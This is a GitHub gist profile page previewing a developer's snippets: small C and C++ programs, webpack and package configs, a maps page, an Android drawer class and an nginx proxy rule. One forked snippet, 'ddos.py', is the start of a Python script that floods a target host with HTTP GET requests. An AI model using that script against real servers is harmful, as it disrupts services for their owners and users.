Skip to content

Instantly share code, notes, and snippets.

View stinkymonkeyph's full-sized avatar
🙊
Disrupting something

Nelmin Jay Magan Anoc stinkymonkeyph

🙊
Disrupting something
View GitHub Profile
/*Author: Nelmin Jay Magan Anoc
*
*/
#include<stdio.h>
void printFibonnaciSequence(int);
int setNumberOfTerms();
@stinkymonkeyph
stinkymonkeyph / calculator.cpp
Created August 2, 2016 12:05
a simple two variable calculator to perform basic operations . add, subtract, multiply and divide.
/*
*Author: Nelmin
*A simple two variable calculator, modify it to your needs.
*/
#include<iostream>
using namespace std;
void displayMenu();
int getMenuChoice();
/*
* @author : Nelmin Jay Magan Anoc
* file handling script to retrieve a simple classlist on a text file
*/
#include<iostream>
#include<fstream>
#include<string>
@stinkymonkeyph
stinkymonkeyph / ddos.py
Created December 23, 2016 17:55 — forked from tinnguyenz/ddos.py
Python ddos script
import socket, sys, os
print "][ Attacking " + sys.argv[1] + " ... ]["
print "injecting " + sys.argv[2];
def attack():
#pid = os.fork()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
print ">> GET /" + sys.argv[2] + " HTTP/1.1"
s.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n")
s.send("Host: " + sys.argv[1] + "\r\n\r\n");
@stinkymonkeyph
stinkymonkeyph / webpack.config.js
Last active July 10, 2017 17:14 — forked from learncodeacademy/webpack.config.js
Sample Basic Webpack Config
//public/asset/js
//client.js
//client.min.js
var debug = process.env.NODE_ENV !== "production";
var webpack = require('webpack');
module.exports = {
context: __dirname + "/public",
devtool: debug ? "inline-sourcemap" : null,
@stinkymonkeyph
stinkymonkeyph / package.json
Created July 10, 2017 17:10
package.json for react applications
{
"name": "moduleloader",
"version": "1.0.0",
"description": "fucking module loading system",
"main": "webpack.config.js",
"scripts": {
"test": "echo \"Error: no test specified\" && exit 1"
},
"author": "none",
"license": "ISC",
@stinkymonkeyph
stinkymonkeyph / package.json
Created July 13, 2017 00:39
react-redux app template older version
// react-redux app template
// based on create-react-app cli
// change { name }
{
"name": "",
"version": "0.1.0",
"private": true,
"dependencies": {
"react": "^15.6.1",
<!DOCTYPE html>
<html>
<head>
<title>My Location</title>
<meta name="viewport" content="initial-scale=1.0, user-scalable=no">
<meta charset="utf-8">
<style>
#map {
height: 616px;
margin-top: 5px;
@stinkymonkeyph
stinkymonkeyph / AppBaseActivity.java
Created April 30, 2018 05:06
Android: Easiest way to reuse a common Navigation drawer among a group of activities.
/*
* This is a simple and easy approach to reuse the same
* navigation drawer on your other activities. Just create
* a base layout that conains a DrawerLayout, the
* navigation drawer and a FrameLayout to hold your
* content view. All you have to do is to extend your
* activities from this class to set that navigation
* drawer. Happy hacking :)
* P.S: You don't need to declare this Activity in the
* AndroidManifest.xml. This is just a base class.
location ^~ /api {
rewrite ^/api/(.*)$ /$1 break;
proxy_pass http://localhost:6969;
}